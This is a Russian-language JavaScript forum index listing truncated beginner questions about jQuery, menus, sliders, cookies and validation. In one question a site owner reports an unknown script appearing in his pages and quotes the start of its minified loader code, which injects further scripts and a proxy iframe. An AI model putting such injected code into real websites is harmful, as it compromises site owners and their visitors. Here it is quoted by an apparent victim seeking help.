JavaScript
A programming language that conforms to the ECMAScript specification
Explore Questions
There are no popular questions to show right now
-
0 votes1 answer
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes0 answers
4723 questions in this forum
-
Прокрутка flash-сайта браузером
Народ, есть вот сайтик: www.vladgriss.com При нажатии на один из языков открывается флеш-сайт в режиме full-screen. Как сделать браузерную прокрутку по вертикали в самом режиме full screen??? Уже долго ищу, не могу придумать или найти вариант решения проблемы Хелп)
0 votes0 answers -
Валидация радиокнопок
Подскажите как провалидировать радиокнопки?
0 votes2 answers -
Использование toggleClass
Добрый день. Имеется верстка блока такого плана: http://t-orange.bl.ee/test-toggle/ Переключение между открытыми/ закрытыми состояниями происходит через toggleClass. Каким образом сворачивать другие блоки при открытом текущем?
0 votes4 answers -
замена фона
Здравствуйте, опять у меня тупняк с, наверное, элементарной проблемой. Заключается она вот в чем: сделал окошко, в котором есть закладки, по типу как здесь Эрудит, Загадки, Конкурсы и т.д. Хочу сделать вот что - при наведении курсора на каждую такую вкладку цвет ее фона заменяется с серого на уникальный цвет, то есть для каждой вкладки свой цвет. При отведении курсора цвет становится опять серым. Это все понятно, сделал, работает. Проблема вот в чем - при нажатии на вкладку цвет фона должен фиксироваться, и не заменяться опять на серый при отведении курсора. Кто-нибудь может подсказать, как реализовать это? Вот код текущей реализации: function hoveron(elem, tip) - на …
0 votes8 answers -
chrome cursor mousedown
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <script src="http://code.jquery.com/jquery-latest.js"></script> <script type="text/javascript"> var mouseDown = false; $(document).ready(function() { $('#dragArea').mousemove(function(e) { if (mouseDown) { this.style.cursor = 'pointer'; } else { this.style.cursor = 'default'; } }); $('#dragArea').mousedown(function() {mouseDown = true; this.style.cursor = 'pointer'; }); $('#dragArea').mouseup(function() { mouseDown = false; this.style.cursor = 'default'; }); $('#pageBody').mousemove(function() { this.style.cursor = 'default'…
0 votes2 answers -
Выпадающее меню
Здраствуйте. Помогите плз чайнику в явескрипт. Почему ЭТО работает тока в ИЕ6? <script type="text/javascript"> $(document).ready (function show(n){ $("#tt"+n).css("background-image", "url(2.jpg)"); $("#hid"+n).css("visibility", "visible"); }); $(document).ready (function hide(n){ $("#tt"+n).css("background-image", "none"); $("#hid"+n).css("visibility", "hidden"); }); </script> ........... <body> <ul id="nav"> <li><a href="#null">Контакты</a></li> <li id="tt1" onmouseover="show('1');" onmouseout="hide('1');"><a href="#null">Клиенты</a> <ul id="hid1"> <li><a href="#null">Т…
0 votes1 answer -
не подключается js
подскажите пожалуйста почему так работает, а так нет. код принципиально одинаков консоль пишет, что не определена функция galleryView(), а значит как минимум не подключается файл jquery.galleryview.js . не могу понять в чём проблема
0 votes3 answers -
прямой вызов функции в обработчике
помогите пожалуйста разобраться и исправить код после клика на элементе .edit_album я вызываю бутстраповское модальное окно так: $(document).on('click', '.edit_album', eee);function eee(){ $('#modalEditAlbum').modal();}этот способ работает. но следующий способ не работает: $(document).on('click', '.edit_album', $('#modalEditAlbum').modal());так как в результате модальное окно вызывается при загрузке странички, а этого мне не надо
0 votes3 answers -
Onkeypress в ИЕ
window.onkeypress = function() { alert('текст'); } Работает везде кроме ИЕ. Подскажите как в ие это реализовать?
0 votes1 answer -
Минимальное значение в массиве
Доброго времени суток форумчане! К примеру есть масив: var mas = new Array(); mas[0] = 0; mas[1] = 1; mas[2] = 2; Нужно как то определить минимальное значение в данном массиве! Пробую так: document.write(Math.min(mas)); Ниче не выходит! Думаю что нужно наверное с помощью цикла, но не до конца понимаю как это воплотить в жизнь. Надеюсь на вашу помощь! Заранее спасибо за помощь
0 votes1 answer -
2события на одно действие
вот сейчас есть стандартное $("#id").click(function() { а мне нужно чтобы действие произошло или по нажатию по элементу или по нажатию клавиши enter когда находишься в фокусе заданного input элемента и другой input элемент не пустой. как сделать по клавиши $(document).keyup(function(event){ if (event.keyCode==13) { но вот как всё вместе совместить. все сделано без form ,просьба не предлагать сделать через form. или хотя если подскажете какую функцию написать примерно на onsubmit
0 votes5 answers -
Text-shadow или box-shadow по кнопке
Хочу сделать изменение цвета тени по нажатию кнопки. Но никак не могу допереть. Может функцией? Объектной модели нет у этих стилей. <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/> <style type="text/css"> #hw { position: absolute; left: 120px; top: 50px; text-shadow: 2px 2px; color: red; font: 30px impact; } #but { position: absolute; left: 120px; top: 100px; } </style> </head> <body> <div id="hw">Hello world</div> <div id="but"> <table> <tr> <td> <input id="ct" type="text" size="7"/> </td> <td&…
0 votes5 answers -
drag and drop (jquery ui)
Не получается сделать одну вещицу(( Использую jquery ui плагины (Draggable и Sortable) для перемещения блоков . Суть: Есть блок (id="draggable"), который можно клонировать и перетягивать в ячейки таблицы. Важно, чтобы в 1 ячейку можно было перенести только 1 блок(т.е. в пустую ячейку). С этим проблем нет. Блоки, которые уже находятся в ячейках таблицы, тоже можно переносить в пустые ячейки... но к сожалению, они добавляются и в занятые ячейки(такого быть не должно)(( Никак не могу исправить эту проблему, помогите пожалуйста, 3 день мучаюсь Вот код
0 votes0 answers -
Неизвестный скрипт
Добрый день! Сегодня заметил непонятно откуда взявшийся скрипт <script src="/vgttkru/t_filter.js" async="" type="text/javascript"></script> Он прописывается автоматически на создаваемых или редактируемых страницах сайта. Открывается по ссылке http://moskwa.rpk-service.su/vgttkru/t_filter.js Внутри код: (function(){function g(a,b){var c=a.createElement("script");c.type="text/javascript";c.async=!0;c.src="/vgttkru/t_filter.js";b&&(c.src+="?"+b);a.body.appendChild(c)}function m(a){return"/vgttkru/filter_proxy_iframe.html?q="+a+"/d"+location.hostname}function n(a){try{var b=document.getElementById("vegetatika-frame")||document.createElement("I…
0 votes1 answer -
Количество объектов в function
Здравствуйте. Использую простенькую функцию: function hide(nodeId){ var node = document.getElementById(nodeId); if (node) { node.style.display = 'none'; } }function show(nodeId){ var node = document.getElementById(nodeId); if (node) { node.style.display = 'inline'; } }Так вот. У меня несколько картинок(объектов) и замысел в том, чтобы при нажатии на одну кнопку - появлялась одна картинка, а все остальные исчезали Прописал вот что: onclick="show('car'),hide('car2','car3','car4','car5','car6')"Так вот, в итоге, почему-то hide применяется не ко всем объектам, которые я прописал, а только к первым 2 (или 3), остальные игнорируют функц…
0 votes3 answers -
Настроить слайдер
Добрый день, есть slick слайдер http://prntscr.com/973x32 с вот такими настройками $('.slider-center').slick({ infinite: true, speed: 500, fade: true, cssEase: 'linear', autoplay:true});на слайдере есть отдельно текст, подскажите как при каждом смене слайдера сделать так чтоб текст появлялся с другой аннимацией, например bounceInLeft?
0 votes3 answers -
Баг скроллинга в чате (на моб.устройстве)
Доброго времени суток. Помогите найти и устранить ошибку. При отправке сообщения, чат скроллится в самый конец и через секунду случается скачек на 4-5 сообщения вверх и последние отправленные уже не видно. Не знаю в чем может быть причина. По хорошему, чат должен скроллится в конец к последнему сообщению и на нем фиксироваться. С ПК вроде все нормально отображается, а вот с мобильного устройства замечаются скачки и смещение сообщений. Прикладываю видео с багом Исходники чата
0 votes0 answers -
обработка confirm
Как сделать, чтобы, если пользователь нажал на кнопку, выводился confirm. Если значение true вывести alert1, если false - alert2
0 votes7 answers -
Помогите с cookie
Здравствуйте, помогите добавить в скрипт сдвиг вправо панели "А" вместе с блоками при нажатии на пункт меню и прикрутить запоминание положения блоков в cookie. http://jsfiddle.net/qwertylist/kLLf0e4j/ Заранее благодарю.
0 votes3 answers -
Изменить только текст
<a href=""><i>текст</i>еще какой-то текст</a>Вот вопрос,можно ли через селектор jquery менять только текст,который не в теге <i>?
0 votes4 answers -
Меняем класс у элемента
Ребят, приветствую! Реализовал задачу на js, чтоб, при клике по элементу, менялся его класс: $('.categories-show-in').click(function() { $('.categories-show-in').attr('class', 'categories-show-out');});$('.categories-show-out').click(function() { $('.categories-show-out').attr('class', 'categories-show-in');});При первом клике, да, класс у элемента меняется на categories-show-out, но при последующих кликах класс у элемента не меняется. Помогите решить проблему. P.S. Мне нужно, чтоб класс был заменен, а не дописан
0 votes2 answers -
Можно упростить?
Привет, други. Вот есть такой скрипт у меня: function Audio(){ document.getElementById("GreyDiv").style.display="block"; document.getElementById("PhoneUsFrame").style.display="block"; document.getElementById("Audio").style.display="block"; } function Image(){ document.getElementById("GreyDiv").style.display="block"; document.getElementById("PhoneUsFrame").style.display="block"; document.getElementById("Image").style.display="block"; } function Video(){ document.getElementById("GreyDiv").style.display="block"; document.getElementById("PhoneUsFrame").style.display="block"; document.getElementById("Vide…
0 votes7 answers -
URL hash
Нужно извлечь из hash адрес и перейти по нему, не могу осуществить.. var hash = document.location.hash; file_load(hash); вот это не работает ( З.Ы. file_load это функция мною прописанная заранее..
0 votes2 answers -
Помогите найти скрипт - скроллбар
Не могу найти скрипт скролл бара. Нужен как в гугле - https://docs.google.com/viewer?url=http%3A%2F%2Fresearch.google.com%2Farchive%2Fbigtable-osdi06.pdf Там как-то спарсить не удалось немного, помогите, пожалуйста, найти скрипт.
0 votes1 answer -
И снова подсветка текущего раздела
Здравствуйте! Есть скрипт подсветки раздела - добавляет класс родительскому элементу. Работает даже при передаче в адресной строке GET-параметров и с учётом вложенности каталога. НО! У меня есть каталог /magazine/male_articles/ а есть вложенные каталоги, например /magazine/male_articles/some_category/. Когда переходишь в категорию, то класс добавляется и текущему разделу, и общему разделу /magazine/male_articles/, то бишь этот раздел главный, а остальные - вложенные и, так как он присутствует в адресе каждой вложенной ссылки, то и подсвечивается постоянно. Как можно убрать с него подсветку при выборе подкатегорий? Сам скрипт: $(function () {$('.magazine_nav ul li a').each…
0 votes5 answers